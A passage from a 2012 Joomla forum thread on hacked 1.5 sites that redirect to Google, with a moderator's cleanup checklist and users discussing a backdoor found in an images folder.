[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the security Checklist 7 link below.

Note: The forum post tool will work with all versions of Joomla.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Sun Sep 23, 2012 4:30 am

siongraham, philD, and others

My apologies for not getting back sooner but thanks. I found a backdoor after inspecting my logs. There was definitely unusual activity to that backdoor file and I took it out.

Just to be safe, I installed an unhacked backup, changed ALL passwords, then deleted and made new FTP accounts. I also installed a firewall on my sites.

This attack really bothers me because my passwords are hard as hell that contain numbers, upper/lowercase, and all sorts of symbols. I don't even keep the passwords on my computer.

In addition, I just want to mention that my extensions are updated, and etc. I am using 1.5.26 and somehow the hacker was still able to install a backdoor in my joomla images folder. Fortunately, it's fixed and everything is running smooth.

User avatar
euoceo
Joomla! Guru
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Sun Sep 23, 2012 4:38 am

The complexity of passwords have no bearing when the hack is exploiting code that allows someone to gain access to the website as the owner of the site files. Passwords let you block common front-end tasks and your admin stuff, but the website still runs as the owner of the site, so an exploit that allows someone to gain access to write files to a directory bypasses all that. I've seen complete file-manager apps uploaded to hack sites that allow someone to browse (and edit) the entire site like it was on their desktop!
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Sun Sep 23, 2012 5:20 am

euoceo,

Thank you for your post. It's post like yours and others that make us learn all the time!

Take it easy.


Locked

Return to “Security in Joomla! 1.5”